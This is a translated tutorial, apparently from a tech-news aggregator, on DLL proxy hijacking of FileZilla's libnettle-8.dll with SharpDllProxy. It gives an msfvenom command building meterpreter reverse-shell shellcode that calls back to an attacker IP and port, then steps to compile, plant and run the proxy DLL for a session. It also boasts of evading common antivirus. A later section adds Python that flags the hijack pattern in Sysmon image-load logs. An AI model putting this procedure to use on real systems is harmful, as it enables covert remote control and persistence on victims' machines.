
How to perform DLL proxy forwarding and weiquan Analysis

2025-04-05 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

Many newcomers are unclear about how to carry out DLL proxy forwarding and weiquan analysis. To help with that, the editor below walks through it in detail; anyone who needs it is welcome to follow along, and I hope you gain something from it.

DLL hijacking

Since Windows 7, the system uses KnownDLLs to manage DLL loading; the list lives in the registry at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs. A DLL listed under this key is never loaded from the directory of the executable itself, only from the system directory (System32). Not every DLL is written to this key, however, which is why DLL hijacking is still possible.

A DLL generated directly with msfvenom is detected and killed immediately by antivirus.

SharpDllProxy

The name sounds like a SOCKS proxy, but it is not. The tool comes from https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/, and the author's blog can also be consulted for the implementation details.

Preface

First, understand how a dynamic link library is used. If application A wants to call the GetFunkyData() function in DataFunctions.dll, it has to load DataFunctions.dll. The tool therefore creates a fake DataFunctions.dll with exactly the same name that does two things: ① it acts as a springboard and forwards every exported function to the real DataFunctions.dll, which is where the "proxy" in the name comes from; ② it carries shellcode inside the fake DataFunctions.dll. The author's original diagram was attached here:

Experimental process

Target program

This experiment took some time. Taking FileZilla as the target, how do we find the DLL that needs to be loaded? As the author says, copy the executable out of its installation directory and run it, and the error tells you which DLL it is missing. As follows:

This means the copied executable needs that DLL in order to run, so we build a fake libnettle-8.dll for it.

Generate shellcode

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.29 LPORT=4444 -f raw > shell.bin

The experiment begins.

First download SharpDllProxy from https://github.com/Flangvik/SharpDllProxy, then compile it with Visual Studio 2019. Try not to use other versions: I used Visual Studio 2017 and could not resolve all kinds of errors for a long time, although that may also have been an environment problem.

Open the SharpDllProxy solution file directly in VS and choose "Build Solution".

Use SharpDllProxy.exe to generate the fake libnettle-8.dll. Put shell.bin and the DLL to be faked into the directory shown above, then run: .\SharpDllProxy.exe --dll libnettle-8.dll --payload shell.bin

The output directory contains a C file and a DLL; the DLL is a copy of the original libnettle-8.dll.

Analysing the C program: lines 9 to 494 are the export-forwarding declarations, which pass every function the application calls through to the original DLL for processing.

Line 497 is where the shellcode is inserted. The key code is small; in fact the contents of shell.bin could be embedded directly in the source file, which reduces the number of suspicious files. As generated, it reads the file in binary mode, allocates memory with VirtualAlloc and executes the shellcode. From this point the usual evasion variations apply, such as changing how the payload is loaded, or encrypting the shellcode and decrypting it at runtime.

Compile the C file above with VS: File > New > Project > Dynamic-Link Library, with the project name libnettle-8. Paste the generated C code into the project and build it.

Place the three files (tmpD475.dll, libnettle-8.dll, shell.bin) on the target system, start the msf listener, then run the program and the session comes back.
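From the defender's side, the procedure above leaves a recognisable footprint in image-load telemetry: an unsigned DLL loaded from the application's own directory, and a second, temp-named DLL (the renamed original) loaded beside it. The following Python is an added example, not code from the article or from the SharpDllProxy project; it triages constructed Sysmon-style Event ID 7 (ImageLoad) records for that pattern. The sample events, the KnownDLLs subset and the tmpXXXX.dll naming pattern (taken from the article's tmpD475.dll) are assumptions.

```python
import ntpath
import re

# Constructed subset of KnownDLLs; on a real host read the registry key the
# article quotes instead of hard-coding names.
KNOWN_DLLS = {"kernel32.dll", "ntdll.dll", "user32.dll", "advapi32.dll"}
SYSTEM32 = "c:\\windows\\system32"
# Assumption: the renamed original keeps a tmpXXXX.dll name, as in the
# article's run (tmpD475.dll). Treat it as a weak, corroborating indicator.
TMP_DLL = re.compile(r"^tmp[0-9a-f]{4}\.dll$", re.IGNORECASE)

# Constructed sample events: Sysmon Event ID 7 fields flattened to key=value.
SAMPLE_EVENTS = [
    "Image=C:\\Program Files\\FileZilla FTP Client\\filezilla.exe|ImageLoaded=C:\\Windows\\System32\\kernel32.dll|Signed=true",
    "Image=C:\\Program Files\\FileZilla FTP Client\\filezilla.exe|ImageLoaded=C:\\Program Files\\FileZilla FTP Client\\libnettle-8.dll|Signed=false",
    "Image=C:\\Program Files\\FileZilla FTP Client\\filezilla.exe|ImageLoaded=C:\\Program Files\\FileZilla FTP Client\\tmpD475.dll|Signed=false",
    "Image=C:\\Users\\bob\\app.exe|ImageLoaded=C:\\Users\\bob\\user32.dll|Signed=false",
]


def parse_event(line):
    """Split one 'k=v|k=v' record into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def assess(event):
    """Return the indicator names that fire for a single image-load event."""
    host_dir = ntpath.dirname(event["Image"]).lower()
    dll = event["ImageLoaded"]
    dll_dir, dll_name = ntpath.dirname(dll).lower(), ntpath.basename(dll).lower()
    hits = []
    if dll_dir == host_dir and event.get("Signed", "false").lower() != "true":
        hits.append("unsigned DLL loaded from the executable's own directory")
    if dll_name in KNOWN_DLLS and dll_dir != SYSTEM32:
        hits.append("KnownDLLs name loaded from outside System32")
    if TMP_DLL.match(dll_name):
        hits.append("temp-named DLL: possible renamed original behind a proxy")
    return hits


def scan(lines):
    """Map each loaded DLL path that fired at least one indicator to its hits."""
    findings = {}
    for line in lines:
        event = parse_event(line)
        hits = assess(event)
        if hits:
            findings[event["ImageLoaded"]] = hits
    return findings


if __name__ == "__main__":
    for path, hits in scan(SAMPLE_EVENTS).items():
        print(path, "->", "; ".join(hits))
```

The first indicator alone is noisy for applications that legitimately ship unsigned third-party DLLs, as FileZilla does; compare the file hash against a known-good install before escalating, and weight the finding up when the temp-named DLL appears alongside it.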

Tested against the most commonly used antivirus products (360, Huorong and Security Butler), it went undetected.
